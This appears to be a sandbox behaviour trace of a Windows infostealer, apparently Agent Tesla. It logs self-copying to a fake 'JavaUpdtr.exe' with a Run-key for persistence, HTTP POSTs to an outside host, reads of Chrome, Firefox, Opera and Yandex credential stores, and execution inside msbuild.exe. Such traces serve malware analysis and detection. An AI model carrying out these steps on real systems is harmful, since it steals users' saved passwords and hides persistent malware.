File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz, type = file_attributes True 1
Fn
File Get Info filename = C:\Users, type = file_attributes True 1
Fn
File Create Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gmmqacgpk.exe, type = file_attributes True 1
Fn
File Copy source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gmmqacgpk.exe, destination_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, value_name = Java Updtr, type = REG_NONE False 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, value_name = Java Updtr, data = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe, size = 130, type = REG_SZ True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
Fn
Socket Connect remote_address = 46.166.182.114, remote_port = 80 True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Socket Send flags = NO_FLAG_SET, size = 263, size_out = 263 True 1
Fn
Data
Inet Open Session user_agent = Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) True 1
Fn
Inet Open Connection protocol = http, server_name = www.agenttesla.com, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = /post.php True 1
Fn
Inet Send HTTP Request headers = User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729), Content-Type: application/x-www-form-urlencoded, Host: www.agenttesla.com, Content-Length: 225, Expect: 100-continue, url = www.agenttesla.com/post.php True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 4096, size_out = 367 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 367 True 1
Fn
Data
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
Fn
Socket Connect remote_address = 127.0.0.1, remote_port = 80 False 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\Login Data, type = file_attributes True 3
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\Login Data, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\Login Data, type = file_type True 2
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\Login Data, size = 18432, size_out = 18432 True 1
Fn
Data
Environment Get Environment String name = APPDATA, result_out = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\profiles.ini, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\profiles.ini, type = file_type True 2
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\profiles.ini, size = 4096, size_out = 111 True 1
Fn
Data
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\profiles.ini, size = 4096, size_out = 0 True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\logins.json, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Opera Software\Opera Stable\Login Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config, type = file_attributes True 1
Fn
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\IEPass.txt, type = file_attributes False 1
Fn
Environment Get Environment String name = windir, result_out = C:\Windows True 1
Fn
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Fn
Module Get Filename module_name = private_0x0000000000400000, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename module_name = c:\windows\syswow64\advapi32.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename module_name = c:\windows\syswow64\user32.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\CRYPTSP.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rsaenh.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\bcrypt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\RpcRtRemote.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CLBCatQ.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\OLEAUT32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemdisp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbemcomn.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\WS2_32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\NSI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemprox.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wmiutils.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemsvc.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\fastprox.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\NTDSAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\SXS.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\CustomMarshalers\bf7e7494e75e32979c7824a07570a8a9\CustomMarshalers.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\System.Management.ni.dll, size = 2048 True 1
Fn
Module Get Filename module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\wminet_utils.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dwmapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\bc09ad2d49d8535371845cd7532f9271\System.Configuration.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasapi32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasman.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rtutils.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\mswsock.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\wshtcpip.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\wship6.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\winhttp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\webio.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IPHLPAPI.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\WINNSI.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dhcpcsvc6.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dhcpcsvc.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\credssp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CFGMGR32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\DNSAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasadhlp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\fwpuclnt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\shfolder.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Module Get Filename module_name = private_0x0000000000400000, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename module_name = c:\windows\syswow64\advapi32.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename module_name = c:\windows\syswow64\user32.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\CRYPTSP.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rsaenh.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\bcrypt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\RpcRtRemote.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CLBCatQ.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\OLEAUT32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemdisp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbemcomn.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\WS2_32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\NSI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemprox.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wmiutils.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemsvc.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\fastprox.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\NTDSAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\SXS.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\CustomMarshalers\bf7e7494e75e32979c7824a07570a8a9\CustomMarshalers.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\System.Management.ni.dll, size = 2048 True 1
Fn
Module Get Filename module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\wminet_utils.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dwmapi.dll, size = 2048 True 1
Fn
